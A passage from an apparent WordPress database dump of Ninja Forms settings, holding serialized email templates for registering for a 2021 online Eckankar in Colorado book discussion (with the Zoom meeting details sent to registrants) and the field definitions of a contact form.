information.</p>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:194;}i:1;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-19 08:12:04\";s:5:\"label\";s:47:\"ECK Book Discussion - Registration Confirmation\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:3:\"tag\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:7:\"message\";s:18:\"{all_fields_table}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:2:\"to\";s:13:\"{field:email}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:13:\"email_message\";s:12203:\"      <title>BOOK      REGISTRATION      TEMPLATE      -FINAL</title>        <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>                  96            </noscript>  <![endif]-->    <div style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\"><!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #23507d; font-family: Georgia, serif; background-color:#c0dbf6;\">Eckankar                              In                              Colorado<br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 22px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">Book                                Discussion                                Registration</span><br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">&nbsp;</span>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #23507D; font-family: Arial, sans-serif; line-height: 25px;\">&nbsp;\"Autobiography                                of                                a                                Modern                                Prophet\"</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<br>                                </span></p>                              <p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You                                  For                                  Registering!                                  <br></span></p>                              <p style=\"font-size: 18px;\"><strong>You                                  Are                                  Signed                                  Up                                  For                                  The                                  Following                                  Book                                  Discussion:<br>&nbsp;<span style=\"color: #23507d;font-size: 19px;\">\"Autobiography                                    of                                    a                                    Modern                                    Prophet\"                                    -Online<br>                                  </span><br>                                </strong><span style=\"color: #333333;font-size: 19px;\">This                                  class                                  started                                  on                                  <strong>May                                    16th,                                    2021</strong>                                  and                                  will                                  occur</span><span style=\"color: #333333;font-size: 19px; font-weight: bold;\">&nbsp;every                                  3rd                                  Sunday                                  --                                  </span><span style=\"color: #333333;font-size: 19px; font-weight: bold;\">11:45                                  a.m.                                  -                                  1:00                                  p.m.</span></p>                              <p style=\"font-size: 22px; color: #f28a27;\"><strong>Zoom                                  Login                                  Information:</strong></p>                              <strong>Meeting                                ID:</strong>                              844                              4204                              1787<br>                              <strong>Passcode:&nbsp;</strong>369369<br>                              <br>                              <a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\" id=\"https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09\">https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09</a><br>                              <br>                              <strong>Dial-in                                number:                                1-346-248-7799                                (for                                those                                who                                need                                to                                join                                by                                phone)</strong><br>                              <br>                              After                              you                              click                              the                              link,                              you                              will                              be                              prompted                              to                              either                              download                              the                              app                              to                              enter                              the                              meeting                              or                              enter                              through                              your                              browser.                              Please                              note                              that                              Zoom                              works                              best                              if                              you                              download                              the                              app.                              It                              is                              more                              stable                              and                              has                              more                              functions.                              Select                              use                              computer                              audio                              for                              sound.<br>                              <br>                              Please                              join                              the                              meeting                              5                              -                              10                              minutes                              ahead                              of                              time                              to                              help                              us                              start                              on                              time.                              We                              look                              forward                              to                              seeing                              you                              at                              this                              online                              event.<br>                              <br>                              See                              you                              there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are                                receiving                                this                                email                                because                                you                                have                                submitted                                a                                request                                through                                the                                <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in                                  Colorado                                  website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you                                have                                any                                questions                                regarding                                the                                origin                                of                                this                                email,                                please                                feel                                free                                to                                get                                in                                touch,                                we\'re                                always                                happy                                to                                help                                out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\" style=\"text-decoration: none;\"><img style=\"color: rgb(204, 204, 204);\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" class=\"fr-fic fr-dii\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar                                In                                Colorado                                -2021<br>                                <a class=\"unsub\" href=\"mailto:webmaster@eckankar-colorado.org\" style=\"color: #cccccc; text-decoration: underline;\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table><!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  \";}s:2:\"id\";i:192;}i:2;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-19 08:12:04\";s:5:\"label\";s:24:\"Admin Email Notification\";s:14:\"drawerDisabled\";b:0;s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:72:\"New Book Discussion Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:5564:\"      <meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br><div align=\"center\"><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New Book Discussion</span></div><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">Registration</span><br></div><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\"></span></div></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new Book Discussion registration                                  has been received for <br>\"<span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><b><span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><span style=\"color: #0963ba;\"><span style=\"color: #000000;\"><em>Autobiography of a Modern Prophet</em></span></span></span></b>\"</span>.&nbsp; </p><p style=\"line-height: 125%; margin-top: 0px; margin-bottom: 0px;\"><span style=\"color: #333333; font-size: 20px;\">Class information:<br></span><span style=\"font-size: 20px; line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">11:45 <span style=\"line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">am </span></strong></span>- 1:00 pm - (3rd Sunday)</span></strong></span></p></b><b>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  \";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:193;}i:3;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-19 08:12:04\";s:5:\"label\";s:16:\"Store Submission\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";}s:2:\"id\";i:191;}}s:8:\"settings\";a:34:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:63:\"Book Discussion Registration: Autobiography of a Modern Prophet\";s:10:\"created_at\";s:19:\"2021-05-19 08:12:04\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:7:{i:0;s:77:\"book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(49,'a:7:{s:2:\"id\";i:49;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:9:{i:0;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_268\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_268\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:450;}i:1;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_269\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_269\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:451;}i:2;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:4:\"type\";s:5:\"phone\";s:3:\"key\";s:19:\"phone_1599585699152\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:5:\"label\";s:5:\"Phone\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:19:\"phone_1599585699152\";}s:2:\"id\";i:458;}i:3;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_270\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_270\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:452;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:15:\"Message Subject\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_303\";s:11:\"field_label\";s:15:\"Message Subject\";s:9:\"field_key\";s:11:\"textbox_303\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:453;}i:5;a:2:{s:8:\"settings\";a:36:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:30:\"Please Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:44:\"please_enter_your_message_here_1599585729237\";s:11:\"field_label\";s:30:\"Please Enter Your Message Here\";s:9:\"field_key\";s:44:\"please_enter_your_message_here_1599585729237\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:454;}i:6;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:178:\"<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>\";s:3:\"key\";s:8:\"html_305\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_305\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:455;}i:7;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> 